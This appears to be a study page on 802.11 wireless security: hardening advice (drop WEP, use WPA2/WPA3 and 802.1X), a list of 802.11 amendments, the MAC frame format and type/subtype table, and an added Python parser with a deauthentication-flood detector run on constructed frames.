  • Do not rely on WEP, even 128-bit: it only provides a basic form of authentication between client and AP and is broken regardless of key length. Use WPA2 (CCMP) or WPA3. Nortel suggests a VPN (IPsec) on top.
  • Implement MAC filters if you must, but treat them as a speed bump: they are bypassed by spoofing an address observed on the air.
  • Turning off the AP's SSID broadcast in beacons and probe responses hides little, since clients reveal the SSID in their own probe requests.
  • Turn on 802.1X and EAP (preferably EAP-TLS, or EAP-TTLS/PEAP with server-certificate validation enforced on the clients).
  • Set up the APs to notify the network admin of rogue APs.
Additional definitions Took the following list from Wikipedia - 8/29/2005.
The following standards and task groups exist within the working group:

IEEE 802.11 - The original 1 Mbit/s and 2 Mbit/s, 2.4 GHz RF and IR standard
IEEE 802.11a - 54 Mbit/s, 5 GHz standard (1999, shipping products in 2001)
IEEE 802.11b - Enhancements to 802.11 to support 5.5 and 11 Mbit/s (1999)
IEEE 802.11d - International (country-to-country) roaming extensions
IEEE 802.11e - Enhancements: QoS, including packet bursting
IEEE 802.11F - Inter-Access Point Protocol (IAPP)
IEEE 802.11g - 54 Mbit/s, 2.4 GHz standard (backwards compatible with b) (2003)
IEEE 802.11h - 5 GHz spectrum, Dynamic Channel/Frequency Selection (DCS/DFS) and Transmit Power Control (TPC) for European compatibility
IEEE 802.11i (ratified 24 June 2004) - Enhanced security
IEEE 802.11j - Extensions for Japan
IEEE 802.11k - Radio resource measurement enhancements
IEEE 802.11n - Higher throughput improvements
IEEE 802.11p - WAVE - Wireless Access for the Vehicular Environment (such as ambulances and passenger cars)
IEEE 802.11r - Fast roaming
IEEE 802.11s - Wireless mesh networking
IEEE 802.11T - Wireless Performance Prediction (WPP) - test methods and metrics
IEEE 802.11u - Interworking with non-802 networks (e.g., cellular)
IEEE 802.11v - Wireless network management
IEEE 802.11w - Protected Management Frames

Frame format
PHY layer: PMD header | PLCP header | MAC frame (PSDU)
MAC frame fields (length in bytes):
  Frame Control  Duration/ID  Addr 1  Addr 2  Addr 3  Seq Ctrl  Addr 4  (QoS Ctrl)  Frame Body  FCS
  2              2            6       6       6       2         6       2           0-2312      4
Type/Subtypes (taken from IEEE Std 802.11, 1999 Edition R2003)
  Type value (b3 b2)   Type description   Subtype value (b7 b6 b5 b4)   Subtype description
00 Mgmt 0000 Association Request
00 Mgmt 0001 Association Response
00 Mgmt 0010 Re-association Request
00 Mgmt 0011 Re-association Response
00 Mgmt 0100 Probe Request
00 Mgmt 0101 Probe Response
00 Mgmt 0110-0111 Rsvd
00 Mgmt 1000 Beacon
00 Mgmt 1001 Announcement Traffic Indication Message (ATIM)
00 Mgmt 1010 Disassociation
00 Mgmt 1011 Authentication
00 Mgmt 1100 Deauthentication
00 Mgmt 1101-1111 Rsvd
01 Ctrl 0000-1001 Rsvd
01 Ctrl 1010 Power Save (PS)-Poll
01 Ctrl 1011 RTS - optional collision reduction scheme. RTS is sent as the first step of a two-way handshake before sending data frames
01 Ctrl 1100 CTS - response to RTS
01 Ctrl 1101 Ack
01 Ctrl 1110 Contention-Free (CF)-End
01 Ctrl 1111 CF-End + CF-Ack
10 Data 0000 Data
10 Data 0001 Data + CF-Ack
10 Data 0010 Data + CF-Poll
10 Data 0011 Data + CF-Ack + CF-Poll
10 Data 0100 Null function (no data)
10 Data 0101 CF-Ack (no data)
10 Data 0110 CF-Poll (no data)
10 Data 0111 CF-Ack + CF-Poll (no data)
10 Data 1000-1111 Rsvd
11 Rsvd 0000-1111 Rsvd
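Added example (my own code, not from the standard or a cited source): a parser for the Frame Control field and the fixed MAC header laid out above, using the type/subtype table, plus a detector for the unprotected deauthentication flood that 802.11w is meant to stop. The frames are constructed byte strings, not captures. QoS Data (data subtype 1000, from 802.11e) is added to the name table because real traffic contains it, although the 1999 table above still marks that subtype reserved.

```python
# Added example (this page's editor, not code from any cited source): decode the
# 802.11 Frame Control field and 24-byte MAC header per the table above, then
# flag a deauthentication flood. All frames below are constructed test data.
import struct
from collections import Counter

TYPE_NAMES = {0: "Mgmt", 1: "Ctrl", 2: "Data", 3: "Rsvd"}
SUBTYPE_NAMES = {
    (0, 0): "Association Request", (0, 1): "Association Response",
    (0, 2): "Reassociation Request", (0, 3): "Reassociation Response",
    (0, 4): "Probe Request", (0, 5): "Probe Response", (0, 8): "Beacon",
    (0, 9): "ATIM", (0, 10): "Disassociation", (0, 11): "Authentication",
    (0, 12): "Deauthentication",
    (1, 10): "PS-Poll", (1, 11): "RTS", (1, 12): "CTS", (1, 13): "Ack",
    (1, 14): "CF-End", (1, 15): "CF-End + CF-Ack",
    (2, 0): "Data", (2, 4): "Null function",
    (2, 8): "QoS Data",  # 802.11e addition, reserved in the 1999 table
}


def parse_frame_control(fc):
    """Frame Control is 2 bytes: byte 0 = version(b0-b1) | type(b2-b3) | subtype(b4-b7),
    byte 1 = flags (ToDS, FromDS, More Frag, Retry, Pwr Mgmt, More Data, Protected, Order)."""
    b0, b1 = fc[0], fc[1]
    ftype, subtype = (b0 >> 2) & 0x3, (b0 >> 4) & 0xF
    return {
        "version": b0 & 0x3,
        "type": ftype,
        "subtype": subtype,
        "name": SUBTYPE_NAMES.get((ftype, subtype), f"{TYPE_NAMES[ftype]} subtype {subtype:04b}"),
        "to_ds": bool(b1 & 0x01),
        "from_ds": bool(b1 & 0x02),
        "retry": bool(b1 & 0x08),
        "protected": bool(b1 & 0x40),  # WEP/TKIP/CCMP on data; 802.11w MIC on management
    }


def parse_header(frame):
    """Parse FC, Duration/ID, Addr1-3 and Sequence Control of a management or data frame."""
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte MAC header")
    fc = parse_frame_control(frame[0:2])
    seq_ctrl = struct.unpack("<H", frame[22:24])[0]
    hdr = {
        "fc": fc,
        "duration": struct.unpack("<H", frame[2:4])[0],
        "addr1": frame[4:10].hex(":"),
        "addr2": frame[10:16].hex(":"),   # transmitter address
        "addr3": frame[16:22].hex(":"),
        "fragment": seq_ctrl & 0xF,
        "sequence": seq_ctrl >> 4,
        "body": frame[24:],
    }
    if fc["type"] == 0 and fc["subtype"] in (10, 12) and len(hdr["body"]) >= 2:
        hdr["reason_code"] = struct.unpack("<H", hdr["body"][:2])[0]
    return hdr


def build_frame(fc_byte0, flags, addr1, addr2, addr3, seq, body=b""):
    """Constructed-frame helper for the demo, not a transmitter."""
    return (bytes([fc_byte0, flags]) + struct.pack("<H", 314)
            + addr1 + addr2 + addr3 + struct.pack("<H", seq << 4) + body)


def deauth_flood_sources(frames, threshold):
    """Transmitter addresses that sent more than `threshold` unprotected deauth/disassoc frames.

    With 802.11w those frames carry a MIC and the Protected bit; a burst of
    unprotected ones from one BSSID is the classic deauth attack signature.
    """
    counts = Counter()
    for raw in frames:
        hdr = parse_header(raw)
        fc = hdr["fc"]
        if fc["type"] == 0 and fc["subtype"] in (10, 12) and not fc["protected"]:
            counts[hdr["addr2"]] += 1
    return sorted(addr for addr, n in counts.items() if n > threshold)


def demo():
    """A beacon, a data frame, then 20 spoofed deauths 'from' the AP (reason 7)."""
    ap = bytes.fromhex("001122334455")      # constructed BSSID
    sta = bytes.fromhex("66778899aabb")     # constructed client
    bcast = b"\xff" * 6
    frames = [build_frame(0x80, 0x00, bcast, ap, ap, 1, bytes(12))]     # beacon
    frames.append(build_frame(0x08, 0x01, ap, sta, ap, 2, b"payload"))  # data, ToDS
    for seq in range(3, 23):
        frames.append(build_frame(0xC0, 0x00, sta, ap, ap, seq, struct.pack("<H", 7)))
    return frames


if __name__ == "__main__":
    for raw in demo()[:3]:
        print(parse_header(raw)["fc"]["name"])
    print(deauth_flood_sources(demo(), 10))
```

On a production sensor the same logic would read from a monitor-mode interface or a pcap rather than constructed bytes; the counting window and threshold would be per BSSID per minute, and a flagged burst should be cross-checked against whether the BSS advertises management frame protection in its RSN element.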